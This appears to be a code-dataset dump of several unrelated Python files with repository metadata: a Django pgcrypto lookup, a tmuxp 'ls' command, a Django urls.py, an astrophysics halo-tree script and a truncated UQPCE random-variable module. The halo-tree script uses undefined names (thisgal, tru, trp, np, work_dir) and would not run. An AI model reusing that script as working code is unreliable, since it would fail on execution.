        # Lookup that decrypts the column on the database side (pgcrypto's
        # decrypt/dearmor) so comparison operators run against plaintext.
        def as_postgresql(self, qn, connection):
            lhs, lhs_params = self.process_lhs(qn, connection)
            rhs, rhs_params = self.process_rhs(qn, connection)
            # The cipher key is spliced between lhs and rhs params to match
            # the extra %s placeholder in the SQL template below.
            params = lhs_params + [self.lhs.output_field.cipher_key] + rhs_params
            rhs = connection.operators[self.lookup_name] % rhs
            # Map the Python-side cipher name to pgcrypto's algorithm tag.
            cipher = {
                'AES': 'aes',
                'Blowfish': 'bf',
            }[self.lhs.output_field.cipher_name]
            return "convert_from(decrypt(dearmor(%s), %%s, '%s'), 'utf-8')%s %s" % \
                (lhs, cipher, self.lhs.output_field.field_cast, rhs), params

    # Register a decrypting lookup subclass for each supported operator.
    for lookup_name in ('exact', 'gt', 'gte', 'lt', 'lte'):
        class_name = 'EncryptedLookup_%s' % lookup_name
        lookup_class = type(class_name, (EncryptedLookup,), {'lookup_name': lookup_name})
        BaseEncryptedField.register_lookup(lookup_class)
| 6,048 | 2,680 | 242 |
0164ea9a92965c440456dfd2e3e253929b4f943e | 571 | py | Python | tmuxp/cli/ls.py | otherJL0/tmuxp | 52d9c0d3c13556fd5d6ffdb3125fcf3afd0e845d | [
"MIT"
] | 1,615 | 2015-01-05T19:31:48.000Z | 2018-03-09T08:09:20.000Z | tmuxp/cli/ls.py | sthagen/tmuxp | 1c8bfaec3d4f622c4fbc717a873279046c40a664 | [
"MIT"
] | 244 | 2015-02-13T16:24:53.000Z | 2018-03-10T05:15:33.000Z | tmuxp/cli/ls.py | otherJL0/tmuxp | 52d9c0d3c13556fd5d6ffdb3125fcf3afd0e845d | [
"MIT"
] | 118 | 2015-01-16T13:47:39.000Z | 2018-02-07T21:35:31.000Z | import os
import click
from .constants import VALID_CONFIG_DIR_FILE_EXTENSIONS
from .utils import get_config_dir
@click.command(
name="ls",
short_help="List configured sessions in :meth:`tmuxp.cli.utils.get_config_dir`.",
)
| 27.190476 | 85 | 0.681261 | import os
import click
from .constants import VALID_CONFIG_DIR_FILE_EXTENSIONS
from .utils import get_config_dir
@click.command(
    name="ls",
    short_help="List configured sessions in :meth:`tmuxp.cli.utils.get_config_dir`.",
)
def command_ls():
    """Print the stem of every tmuxp config file in the config directory.

    Entries that are directories, or whose extension is not in
    ``VALID_CONFIG_DIR_FILE_EXTENSIONS``, are skipped.
    """
    tmuxp_dir = get_config_dir()
    # os.path.isdir() already implies existence, so a separate exists() test
    # is redundant.
    if os.path.isdir(tmuxp_dir):
        for f in sorted(os.listdir(tmuxp_dir)):
            stem, ext = os.path.splitext(f)
            # BUG FIX: the directory check must use the full path.  The
            # original tested the bare name, which resolved relative to the
            # current working directory rather than the config directory.
            if (
                os.path.isdir(os.path.join(tmuxp_dir, f))
                or ext not in VALID_CONFIG_DIR_FILE_EXTENSIONS
            ):
                continue
            print(stem)
| 313 | 0 | 22 |
f0c4eea2eb341f55afdd3f15c4cd9f1759fbd1e6 | 131 | py | Python | examplePlugin/urls.py | uzairAK/serverom-panel | 3dcde05ad618e6bef280db7d3180f926fe2ab1db | [
"MIT"
] | null | null | null | examplePlugin/urls.py | uzairAK/serverom-panel | 3dcde05ad618e6bef280db7d3180f926fe2ab1db | [
"MIT"
] | null | null | null | examplePlugin/urls.py | uzairAK/serverom-panel | 3dcde05ad618e6bef280db7d3180f926fe2ab1db | [
"MIT"
] | null | null | null | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.examplePlugin, name='examplePlugin'),
] | 18.714286 | 58 | 0.70229 | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.examplePlugin, name='examplePlugin'),
] | 0 | 0 | 0 |
4105abcfda06aac463d907f00d48142f9f8cdc20 | 1,544 | py | Python | scripts/Halofinding/rsVshm.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 1 | 2021-11-25T16:11:56.000Z | 2021-11-25T16:11:56.000Z | scripts/Halofinding/rsVshm.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 6 | 2020-02-17T13:44:43.000Z | 2020-06-25T15:35:05.000Z | scripts/Halofinding/rsVshm.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 1 | 2021-11-25T16:11:56.000Z | 2021-11-25T16:11:56.000Z | # -*- coding: utf-8 -*-
"""
Test resemblance of HM and RS trees
Created on Sun Jun 14 00:33:52 2015
@author: hoseung
"""
# Load HM
from astropy.io import fits
from astropy.table import Table
import tree
wdir = '/home/hoseung/Work/data/AGN2/'
data = fits.getdata(wdir + "halo/TMtree.fits", 1)
hmt = Table(data)
#%%
idgals = [5232, 5495, 5543, 6061, 5491, 6191]
for idgal in idgals:
prg_treex, prg_tree = tree.tmtree.get_main_prg(hmt, idgal, nout_ini=122, nout_fi=0)
print(prg_treex)
#%%
# Load RS
# 3D plot
tree.treeplots(hmt, thisgal, save=save_dir)
#%%
all_final_halo = tru.final_halo_list(hmt)
## ID list
#%%
# mass-produce plots of halo properties.
quantities=["sam_mvir","mvir","rvir","rs","vrms","vmax"
,"jx","jy","jz","spin","m200b","m200c","m500c","m2500c"
,"xoff","voff","btoc","ctoa","ax","ay","az"]
normalizer=np.array([1e-11,1e-11,1,1,1,1,1,1,1e-11
,1,1e-11,1e-11,1e-11,1e-11,1,1,1,1,1,1,1])
for i, hal in enumerate(all_final_halo[0:10]):
print(i, hal)
tree = tru.get_main_prg_tree(hmt, hal)
fn_save = str(hal) + 'halo_all.pdf'
# trp.plot_all(tree, hal, save=True, out_dir=work_dir, fn_save=fn_save,
# nrows=4, ncols=math.ceil(len(quantities)/4),
# quantities=quantities, normalizer=normalizer)
# trp.plot_all_multiPDF(tree, hal, out_dir=work_dir + 'RS_trees/', fn_save=fn_save,
# nrows=2, ncols=2,
# quantities=quantities, normalizer=normalizer)
trp.trajectory3D(tree, hal, save=work_dir + 'RS_trees/') | 26.169492 | 91 | 0.645078 | # -*- coding: utf-8 -*-
"""
Test resemblance of HM and RS trees
Created on Sun Jun 14 00:33:52 2015
@author: hoseung
"""
# Load HM
from astropy.io import fits
from astropy.table import Table
import tree
wdir = '/home/hoseung/Work/data/AGN2/'
data = fits.getdata(wdir + "halo/TMtree.fits", 1)
hmt = Table(data)
#%%
idgals = [5232, 5495, 5543, 6061, 5491, 6191]
for idgal in idgals:
prg_treex, prg_tree = tree.tmtree.get_main_prg(hmt, idgal, nout_ini=122, nout_fi=0)
print(prg_treex)
#%%
# Load RS
# 3D plot
tree.treeplots(hmt, thisgal, save=save_dir)
#%%
all_final_halo = tru.final_halo_list(hmt)
## ID list
#%%
# mass-produce plots of halo properties.
quantities=["sam_mvir","mvir","rvir","rs","vrms","vmax"
,"jx","jy","jz","spin","m200b","m200c","m500c","m2500c"
,"xoff","voff","btoc","ctoa","ax","ay","az"]
normalizer=np.array([1e-11,1e-11,1,1,1,1,1,1,1e-11
,1,1e-11,1e-11,1e-11,1e-11,1,1,1,1,1,1,1])
for i, hal in enumerate(all_final_halo[0:10]):
print(i, hal)
tree = tru.get_main_prg_tree(hmt, hal)
fn_save = str(hal) + 'halo_all.pdf'
# trp.plot_all(tree, hal, save=True, out_dir=work_dir, fn_save=fn_save,
# nrows=4, ncols=math.ceil(len(quantities)/4),
# quantities=quantities, normalizer=normalizer)
# trp.plot_all_multiPDF(tree, hal, out_dir=work_dir + 'RS_trees/', fn_save=fn_save,
# nrows=2, ncols=2,
# quantities=quantities, normalizer=normalizer)
trp.trajectory3D(tree, hal, save=work_dir + 'RS_trees/') | 0 | 0 | 0 |
3b29ed288583c49b6b5414b265a987a5d61de758 | 54,054 | py | Python | src/PCE_Codes/variables/continuous.py | nasa/UQPCE | 64f2143cddf83ca2e835442db2fc9ef33c6d26be | [
"NASA-1.3"
] | 13 | 2020-11-07T22:03:35.000Z | 2022-01-12T22:08:53.000Z | src/PCE_Codes/variables/continuous.py | nasa/UQPCE | 64f2143cddf83ca2e835442db2fc9ef33c6d26be | [
"NASA-1.3"
] | null | null | null | src/PCE_Codes/variables/continuous.py | nasa/UQPCE | 64f2143cddf83ca2e835442db2fc9ef33c6d26be | [
"NASA-1.3"
] | 4 | 2020-11-23T16:24:03.000Z | 2022-03-25T01:25:21.000Z | from builtins import setattr, getattr
from fractions import Fraction
import math
from multiprocessing import Process, Manager
from warnings import warn, showwarning

try:
    from sympy import *
    import numpy as np
    from scipy.stats import norm, beta, gamma, expon
    from scipy.linalg import pascal
    from scipy.integrate import quad
    from sympy import (
        symbols, zeros, integrate, N, factorial, sqrt, simplify, sympify, Abs
    )
    from sympy.core.numbers import NaN
    from sympy.integrals.integrals import Integral
    from sympy.parsing.sympy_parser import parse_expr
    from sympy.solvers import solve
    from sympy.utilities.lambdify import lambdify

    from mpi4py import MPI
    from mpi4py.MPI import (
        COMM_WORLD as MPI_COMM_WORLD, DOUBLE as MPI_DOUBLE, MAX as MPI_MAX
    )
# BUG FIX: was a bare `except:`, which swallowed *every* exception
# (including KeyboardInterrupt) and masked real errors inside the imported
# packages.  Only a missing package should trigger the friendly exit.
except ImportError:
    warn('Ensure that all required packages are installed.')
    exit()

from PCE_Codes.custom_enums import Distribution, UncertaintyType
from PCE_Codes._helpers import _warn, uniform_hypercube
from PCE_Codes.variables.variable import Variable
from PCE_Codes.error import VariableInputError
class ContinuousVariable(Variable):
    """
    Inputs: pdf- the equation that defines the pdf of the variable values
            interval_low- the low interval of the variable
            interval_high- the high interval of the variable
            order- the order of the model to calculate the orthogonal
            polynomials and norm squared values
            type- the type of variable
            name- the name of the variable
            number- the number of the variable from the file

    Class represents a continuous variable.
    """

    def get_probability_density_func(self):
        """
        Turns the input function into the corresponding probability density
        function by normalizing it so it integrates to 1 over the interval.
        """
        diff_tol = 1e-5
        tol = 1e-12
        f = lambdify(self.x, self.distribution, ('numpy', 'sympy'))
        const = quad(f, self.low_approx, self.high_approx, epsabs=tol, epsrel=tol)[0]
        # Snap near-integer normalization constants to the integer to
        # reduce numerical noise.
        const_rnd = np.round(const)
        if np.abs(const_rnd - const) < diff_tol:
            const = const_rnd
        self.distribution = self.distribution / const

    def standardize(self, orig, std_vals):
        """
        Inputs: orig- the un-standardized values
                std_vals- the attribue name for the standardized vals

        For each variable, it adds a new attribute for the standardized values
        from the original input values.  A general continuous variable is
        already considered standardized, so the values are copied as-is.
        """
        setattr(self, std_vals, getattr(self, orig))
        return getattr(self, std_vals)

    def standardize_points(self, values):
        """
        Inputs: values- unstandardized points corresponding to the variable's
                distribution

        Standardizes and returns the inputs points.
        """
        return values  # general variable must already be standardized

    def unstandardize_points(self, value):
        """
        Inputs: value- the standardized value to be unstandardized

        Calculates and returns the unscaled variable value from the
        standardized value.
        """
        return value  # general variable must already be standardized

    def check_distribution(self):
        """
        Checks all values in an array to ensure that they are standardized.
        Returns -1 (on rank 0) when any value lies outside the approximate
        support of the distribution.
        """
        comm = MPI_COMM_WORLD
        rank = comm.rank
        mx = np.max(self.std_vals)
        mn = np.min(self.std_vals)
        # BUG FIX: `and` binds tighter than `or`, so the original condition
        # `rank == 0 and mx > hi or mn < lo` warned on *every* rank whenever
        # mn < lo.  The bounds test is now parenthesized.
        if rank == 0 and (mx > self.high_approx or mn < self.low_approx):
            warn(
                f'Large standardized value for variable {self.name} '
                'with user distribution found. Check input and run matrix.'
            )
            return -1

    def generate_samples(self, samp_size):
        """
        Inputs: samp_size- the number of points needed to be generated

        Generates points according to the Latin hypercube; each point is in an
        interval of equal probability.  First tries inverse-CDF sampling
        (CDF and inverse each computed in a subprocess with a 10 s timeout);
        falls back to rejection-acceptance sampling if that fails.
        """
        decimals = 30
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank
        is_manager = (rank == 0)

        # Partition samp_size across ranks (first `rem` ranks get one extra).
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks

        self.inverse_func = None
        self.failed = None

        try:
            y = symbols('y')
            if self.failed is not None:
                raise AttributeError  # skip if has already gone through and failed

            # solve for the cumulative density function with 10s timeout
            if is_manager and not hasattr(self, 'cum_dens_func'):
                manager = Manager()
                proc_dict = manager.dict()
                cdf_proc = Process(target=self._calc_cdf, args=(proc_dict,))
                cdf_proc.start()
                cdf_proc.join(10.0)
                if cdf_proc.is_alive():
                    cdf_proc.terminate()
                try:
                    self.cum_dens_func = proc_dict['cum_dens_func']

                    # solve for the inverse function with 10s timeout
                    inv_proc = Process(target=self._invert, args=(proc_dict,))
                    inv_proc.start()
                    inv_proc.join(10.0)
                    if inv_proc.is_alive():
                        inv_proc.terminate()
                    self.inverse_func = proc_dict['inverse_func']
                except KeyError:
                    # Subprocess timed out / died before storing its result.
                    self.failed = 1

            self.failed = comm.bcast(self.failed, root=0)
            if not self.failed:
                self.inverse_func = comm.bcast(self.inverse_func, root=0)
            else:
                raise ValueError

            # plug in random uniform 0 -> 1 to solve for x vals
            all_samples = np.zeros(samp_size)
            for i in range(len(self.inverse_func)):  # multiple solutions
                inv_func = (
                    np.vectorize(
                        lambdify(y, str(self.inverse_func[i]), ('numpy', 'sympy'))
                    )
                )
                samples = N(inv_func(uniform_hypercube(0, 1, count)), decimals)
                comm.Allgatherv(
                    [samples, count, MPI_DOUBLE],
                    [all_samples, seq_count, seq_disp, MPI_DOUBLE]
                )

                if np.min(all_samples) >= self.low_approx and np.max(all_samples) <= self.high_approx:
                    np.random.shuffle(all_samples)
                    return all_samples

                if not (
                    (np.min(samples) >= self.low_approx) and (np.max(samples) <= self.high_approx)
                ):
                    raise ValueError

        # if cdf or inverse func can't be found, use rejection-acceptance sampling
        except (ValueError, NameError, AttributeError):
            func = lambdify(self.x, self.distribution, ('numpy', 'sympy'))

            # Estimate the pdf maximum from random probes (shared via MPI MAX).
            try_total = 5000
            tries = try_total // size + (rank < try_total % size)
            max_all = np.zeros(1)
            try:
                max_val = (
                    np.max(func(
                        np.random.uniform(
                            self.low_approx, self.high_approx, tries
                        )
                    ))
                )
            except RuntimeError:
                max_val = np.max(
                    func(
                        np.random.uniform(
                            self.low_approx, self.high_approx, tries
                        )
                    )
                ).astype(float)

            comm.Allreduce(
                [max_val, MPI_DOUBLE], [max_all, MPI_DOUBLE], op=MPI_MAX
            )

            samples = np.zeros(count)
            all_samples = np.zeros(samp_size)
            i = 0
            j = 0
            y_vals = np.random.uniform(0, max_all, count)
            x_vals = np.random.uniform(self.low_approx, self.high_approx, count)
            func_vals = func(x_vals)

            # while loop until all 'samp_size' samples have been generated
            while i < count:
                if j == count:
                    # Exhausted this batch of candidates; draw a fresh one.
                    y_vals = np.random.uniform(0, max_all, count)
                    x_vals = np.random.uniform(self.low_approx, self.high_approx, count)
                    func_vals = func(x_vals)
                    j = 0
                if y_vals[j] <= func_vals[j]:
                    samples[i] = x_vals[j]
                    i += 1
                j += 1

            comm.Allgatherv(
                [samples, count, MPI_DOUBLE],
                [all_samples, seq_count, seq_disp, MPI_DOUBLE]
            )
            np.random.shuffle(all_samples)
            return all_samples

    def create_norm_sq(self, low, high, func):
        """
        Inputs: low- the low interval bound for the distribution
                high- the high interval bound for the distribution
                func- the function corresponding to the distribution

        Calculates the norm squared values up to the order of polynomial
        expansion based on the probability density function and its
        corresponding orthogonal polynomials.
        """
        orthopoly_count = len(self.var_orthopoly_vect)
        self.norm_sq_vals = np.zeros(orthopoly_count)
        tries = 2
        zero = 0
        # is rounded off at 50 decimals, requiring two decimals places
        norm_sq_thresh = 1e-49

        for i in range(orthopoly_count):
            proc_dict = {}
            for j in range(tries):
                self._norm_sq(low, high, func, i, j, proc_dict)
                try:
                    if (proc_dict['out'] is not None) and (not math.isclose(proc_dict['out'], zero)):
                        self.norm_sq_vals[i] = proc_dict['out']
                        break  # only breaks inner loop
                except KeyError:
                    pass

        if (self.norm_sq_vals == zero).any():
            warn(f'Finding the norm squared for variable {self.name} failed.')

        if (self.norm_sq_vals <= norm_sq_thresh).any():
            warn(
                f'At least one norm squared value for variable {self.name} is '
                f'very small. This can introduce error into the model.'
            )

    def _norm_sq(self, low, high, func, i, region, proc_dict):
        """
        Inputs: low- the low interval bound for the distribution
                high- the high interval bound for the distribution
                func- the function corresponding to the distribution
                i- the index of the norm squared to calculate
                region- which sympy calculation to try for the norm squared
                proc_dict- the dictionary in which the output will be stored

        An assistant to create_norm_sq; each `region` builds the integrand a
        different way (plain sympy product, numerically-evaluated product, or
        re-sympified string) so that a failure in one formulation can be
        retried with another.
        """
        proc_dict['out'] = None
        # round 0.99999999 to 1 to reduce error; if value is small, don't round
        thresh = 1e-2
        tol = 1e-12
        diff_tol = 1e-8
        decimals = 30

        ul = self._numeric_bound(high, is_low=False)
        ll = self._numeric_bound(low, is_low=True)

        # The three regions differ only in how the integrand expression is
        # constructed (the originals were three copy-pasted branches).
        builders = {
            0: lambda: func * self.var_orthopoly_vect[i] ** 2,
            1: lambda: N(func * self.var_orthopoly_vect[i] ** 2, decimals),
            2: lambda: sympify(f'{func} * ({self.var_orthopoly_vect[i]}) ** 2'),
        }
        if region not in builders:
            return
        try:
            f = lambdify(self.x, builders[region](), ('numpy', 'sympy'))
            ans = quad(f, ll, ul, epsabs=tol, epsrel=tol)[0]
            if np.abs(int(ans) - ans) < diff_tol:
                proc_dict['out'] = int(ans)
            elif ans > thresh:
                proc_dict['out'] = round(ans, 7)
            else:
                proc_dict['out'] = ans
        except Exception:
            # This formulation failed; caller tries the next region.
            pass

    @staticmethod
    def _numeric_bound(bound, is_low):
        # Translate the string bounds 'oo'/'-oo'/'pi'/'-pi' into floats for
        # scipy.integrate.quad; numeric bounds pass through unchanged.
        if is_low and bound == '-oo':
            return -np.inf
        if (not is_low) and bound == 'oo':
            return np.inf
        if bound == 'pi':
            return np.pi
        if bound == '-pi':
            return -np.pi
        return bound

    def recursive_var_basis(self, func, low, high, order):
        """
        Inputs: func- the probability density function of the input equation
                low- the low bound on the variable
                high- the high bound on the variable
                order- the order of polynomial expansion

        Recursively calculates the variable basis up to the input 'order'
        via Gram-Schmidt orthogonalization against the pdf weight.
        """
        tol = 1e-12
        if low == '-oo':
            low = -np.inf
        if high == 'oo':
            high = np.inf

        if order == 0:
            self.poly_denom = np.zeros(self.order, dtype=object)
            self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
            self.var_orthopoly_vect[order] = 1
            return
        else:
            self.recursive_var_basis(func, low, high, order - 1)
            curr = self.x ** order

            for i in range(order):
                orthopoly = self.var_orthopoly_vect[i]
                # Cache <p_i, p_i> — it is reused for every later order.
                if self.poly_denom[i] == 0:
                    f = lambdify(self.x, orthopoly ** 2 * func, ('numpy', 'sympy'))
                    self.poly_denom[i] = quad(f, low, high, epsabs=tol, epsrel=tol)[0]

                f = lambdify(self.x, self.x ** order * orthopoly * func, ('numpy', 'sympy'))
                integral_eval = (
                    quad(f, low, high, epsabs=tol, epsrel=tol)[0]
                    / self.poly_denom[i]
                ) * orthopoly
                curr -= integral_eval

            self.var_orthopoly_vect[order] = curr
            if order == self.order and (self.var_orthopoly_vect == 0).any():
                warn(
                    f'Variable {self.name} has at least one orthogonal polynomial '
                    f'that is zero. The model may not be accurate'
                )
            return

    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Generates samp_size number of samples according to the pdf of the
        Variable.
        """
        self.resample = self.generate_samples(samp_size)
        return self.resample

    def _calc_cdf(self, proc_dict):
        """
        Inputs: proc_dict- the dictionary in which the output will be stored

        Calculates the cumulative density function of the distribution.
        Run in a subprocess so the caller can enforce a timeout.
        """
        try:
            proc_dict['cum_dens_func'] = integrate(
                self.distribution, (self.x, self.interval_low, self.x)
            )
        except RuntimeError:
            pass

    def _invert(self, proc_dict):
        """
        Inputs: proc_dict- the dictionary in which the output will be stored

        Solves for the inverse function of the cumulative density function.
        Run in a subprocess so the caller can enforce a timeout.
        """
        y = symbols('y')
        try:
            proc_dict['inverse_func'] = solve(f'{self.cum_dens_func}-y', self.x)
        except (NameError, NotImplementedError, AttributeError, RuntimeError):
            pass

    def check_num_string(self):
        """
        Checks for values in the input file that correspond to pi, -oo, or oo.
        If these values exist, they are converted into values that Python can
        use to create resampling points (infinite bounds are approximated by
        mean +/- 10 standard deviations).
        """
        decimals = 30

        if self.interval_low == '-oo' or self.interval_high == 'oo':
            x = self.x
            integrate_tuple = (x, self.interval_low, self.interval_high)
            self.mean = integrate(x * self.distribution, integrate_tuple)
            stdev = (
                math.sqrt(
                    integrate(x ** 2 * self.distribution, integrate_tuple)
                    -self.mean ** 2
                )
            )

        if isinstance(self.interval_low, str):
            if 'pi' in self.interval_low:
                temp_low = float(self.interval_low.replace('pi', str(np.pi)))
                self.interval_low = temp_low
                self.low_approx = temp_low
            elif self.interval_low == '-oo':
                self.low_approx = N(self.mean - 10 * stdev, decimals)

        if isinstance(self.interval_high, str):
            if 'pi' in self.interval_high:
                temp_high = float(self.interval_high.replace('pi', str(np.pi)))
                self.interval_high = temp_high
                self.high_approx = temp_high
            elif self.interval_high == 'oo':
                self.high_approx = N(self.mean + 10 * stdev, decimals)

    def get_mean(self):
        """
        Return the mean of the variable (computed lazily by integrating
        x * pdf over the interval on first use).
        """
        decimals = 30
        if not hasattr(self, 'mean'):
            x = self.x
            integrate_tuple = (x, self.interval_low, self.interval_high)
            self.mean = integrate(x * self.distribution, integrate_tuple)
        return N(self.mean, decimals)
class UniformVariable(ContinuousVariable):
    """
    Inputs: interval_low- the low interval of the variable
            interval_high- the high interval of the variable
            order- the order of the model to calculate the orthogonal
            polynomials and norm squared values
            type- the type of variable
            name- the name of the variable
            number- the number of the variable from the file

    Represents a uniform variable. The methods in this class correspond to
    those of a uniform variable.
    """

    def generate_orthopoly(self):
        """
        Generates the orthogonal polynomials for a uniform variable up to the
        order of polynomial expansion.
        """
        self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
        x = self.x
        # Legendre three-term recurrence:
        # n*P_n = (2n-1)*x*P_{n-1} - (n-1)*P_{n-2}
        for n in range(self.order + 1):
            if n == 0:
                self.var_orthopoly_vect[n] = 1
            elif n == 1:
                self.var_orthopoly_vect[n] = x
            else:
                self.var_orthopoly_vect[n] = (
                    (
                        (2 * n - 1) * x
                        * self.var_orthopoly_vect[n - 1] - (n - 1)
                        * self.var_orthopoly_vect[n - 2]
                    )
                    / n
                )

    def standardize(self, orig, std_vals):
        """
        Inputs: orig- the un-standardized values
                std_vals- the attribue name for the standardized vals

        Overrides the Variable class standardize to align with
        a uniform distribution (maps [low, high] onto [-1, 1]).
        """
        original = getattr(self, orig)
        mean = (
            (self.interval_high - self.interval_low) / 2 + self.interval_low
        )
        stdev = (self.interval_high - self.interval_low) / 2
        standard = (original[:] - mean) / stdev
        setattr(self, std_vals, standard)
        return getattr(self, std_vals)

    def standardize_points(self, values):
        """
        Inputs: values- unstandardized points corresponding to the variable's
                distribution

        Standardizes and returns the inputs points.
        """
        mean = (
            (self.interval_high - self.interval_low) / 2 + self.interval_low
        )
        stdev = (self.interval_high - self.interval_low) / 2
        return (values - mean) / stdev

    def unstandardize_points(self, value):
        """
        Inputs: value- the standardized value to be unstandardized

        Calculates and returns the unscaled variable value from the
        standardized value.
        """
        mean = (
            (self.interval_high - self.interval_low) / 2 + self.interval_low
        )
        stdev = (self.interval_high - self.interval_low) / 2
        return (value * stdev) + mean

    def check_distribution(self):
        """
        Overrides the Variable class check_distribution to align with
        a uniform distribution; returns -1 when any standardized value
        falls outside [-1, 1] (with a small tolerance).
        """
        if (
            (np.max(self.std_vals) > 1 + 1e-5)
            or (np.min(self.std_vals) < -1 - 1e-5)
        ):
            warn(
                f'Standardized value for variable {self.name} with uniform '
                'distribution outside expected [-1, 1] bounds'
            )
            return -1

    def generate_samples(self, samp_size):
        """
        Inputs: samp_size- the number of points needed to be generated

        Overrides the Variable class generate_samples to align with
        a uniform distribution (Latin-hypercube draw over the interval).
        """
        vals = (
            uniform_hypercube(self.interval_low, self.interval_high, samp_size)
        )
        return vals

    def get_norm_sq_val(self, matrix_val):
        """
        Inputs: matrix_val- the value in the model matrix to consider

        Overrides the Variable class get_norm_sq_val to align with
        a uniform distribution (Legendre norm squared 1/(2n+1)).
        """
        return 1.0 / (2.0 * matrix_val + 1.0)

    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class get_resamp_vals to align with
        a uniform distribution.  Each MPI rank draws its share and the
        results are gathered into one array on every rank.
        """
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank

        # Partition samp_size across ranks (first `rem` ranks get one extra).
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks

        self.resample = np.zeros(samp_size)
        resample = np.random.uniform(-1, 1, count)

        comm.Allgatherv(
            [resample, count, MPI_DOUBLE],
            [self.resample, seq_count, seq_disp, MPI_DOUBLE]
        )

        # The bound is included to help with ProbabilityBox convergence.
        self.resample[0] = -1
        self.resample[1] = 1

        return self.resample

    def check_num_string(self):
        """
        Searches to replace sring 'pi' with its numpy equivalent in any of the
        values that might contain it.
        """
        if isinstance(self.interval_low, str) and 'pi' in self.interval_low:
            self.interval_low = float(self.interval_low.replace('pi', str(np.pi)))

        if isinstance(self.interval_high, str) and 'pi' in self.interval_high:
            self.interval_high = float(self.interval_high.replace('pi', str(np.pi)))

    def get_mean(self):
        """
        Return the mean of the variable (the interval midpoint).
        """
        return (self.interval_high - self.interval_low) / 2 + self.interval_low
class NormalVariable(ContinuousVariable):
    """
    Inputs: mean- the mean of the variable
            stdev- the standard deviation of the variable
            order- the order of the model to calculate the orthogonal
            polynomials and norm squared values
            type- the type of variable
            name- the name of the variable
            number- the number of the variable from the file

    Represents a normal variable. The methods in this class correspond to
    those of a normal variable.
    """

    __slots__ = ('mean', 'stdev')

    def generate_orthopoly(self):
        """
        Generates the orthogonal polynomials for a normal variable up to the
        order of polynomial expansion (physicists' Hermite recurrence,
        rescaled to the probabilists' convention).
        """
        self.var_orthopoly_vect = zeros(self.order + 1, 1)
        x = self.x

        # Physicists' Hermite recurrence: H_n = 2x*H_{n-1} - 2(n-1)*H_{n-2}
        for n in range(self.order + 1):
            if n == 0:
                self.var_orthopoly_vect[n] = 1
            elif n == 1:
                self.var_orthopoly_vect[n] = 2 * x
            else:
                self.var_orthopoly_vect[n] = (
                    2 * x * self.var_orthopoly_vect[n - 1] - 2 * (n - 1)
                    * self.var_orthopoly_vect[n - 2]
                )

        for n in range(self.order + 1):  # transform into probabalists Hermite poly
            self.var_orthopoly_vect[n] = (
                2 ** (-n / 2)
                * self.var_orthopoly_vect[n].subs({x:x / math.sqrt(2)})
            )

        self.var_orthopoly_vect = np.array(self.var_orthopoly_vect).astype(object).T[0]

    def standardize(self, orig, std_vals):
        """
        Inputs: orig- the un-standardized values
                std_vals- the attribue name for the standardized vals

        Overrides the Variable class standardize to align with
        a normal distribution (z-score).
        """
        original = getattr(self, orig)
        standard = (original[:] - self.mean) / (self.stdev)
        setattr(self, std_vals, standard)
        return getattr(self, std_vals)

    def standardize_points(self, values):
        """
        Inputs: values- unstandardized points corresponding to the variable's
                distribution

        Standardizes and returns the inputs points.
        """
        return (values - self.mean) / (self.stdev)

    def unstandardize_points(self, value):
        """
        Inputs: value- the standardized value to be unstandardized

        Calculates and returns the unscaled variable value from the
        standardized value.
        """
        return (value * self.stdev) + self.mean

    def check_distribution(self):
        """
        Overrides the Variable class check_distribution to align with
        a normal distribution; returns -1 (on rank 0) when any standardized
        value lies beyond +/- 4.5 sigma.
        """
        comm = MPI_COMM_WORLD
        rank = comm.rank
        # BUG FIX: `and` binds tighter than `or`, so the original condition
        # warned on every rank whenever min < -4.5.  The sigma test is now
        # parenthesized so only rank 0 warns.
        if rank == 0 and (
            (np.max(self.std_vals) > 4.5) or (np.min(self.std_vals) < -4.5)
        ):
            warn(
                f'Large standardized value for variable {self.name} '
                'with normal distribution found. Check input and run matrix.'
            )
            return -1

    def generate_samples(self, samp_size):
        """
        Inputs: samp_size- the number of points needed to be generated

        Overrides the Variable class generate_samples to align with
        a normal distribution (inverse-CDF over a Latin hypercube, with the
        tails clipped to keep ppf finite).
        """
        low_percent = 8e-17
        high_percent = 1 - low_percent
        dist = norm(loc=self.mean, scale=self.stdev)

        rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
        vals = dist.ppf(rnd_hypercube)

        return vals

    def get_norm_sq_val(self, matrix_value):
        """
        Inputs: matrix_val- the value in the model matrix to consider

        Overrides the Variable class get_norm_sq_val to align with
        a normal distribution (Hermite norm squared n!).
        """
        return math.factorial(matrix_value)

    def get_resamp_vals(self, samp_size):
        """
        Inputs: samp_size- the number of samples to generate according to the
                distribution

        Overrides the Variable class get_resamp_vals to align with
        a normal distribution.  Each MPI rank draws its share and the results
        are gathered into one array on every rank.
        """
        comm = MPI_COMM_WORLD
        size = comm.size
        rank = comm.rank

        # Partition samp_size across ranks (first `rem` ranks get one extra).
        base = samp_size // size
        rem = samp_size % size
        count = base + (rank < rem)
        ranks = np.arange(0, size, dtype=int)
        seq_count = (ranks < rem) + base
        seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks

        self.resample = np.zeros(samp_size)
        resample = np.random.randn(count)

        comm.Allgatherv(
            [resample, count, MPI_DOUBLE],
            [self.resample, seq_count, seq_disp, MPI_DOUBLE]
        )

        return self.resample

    def check_num_string(self):
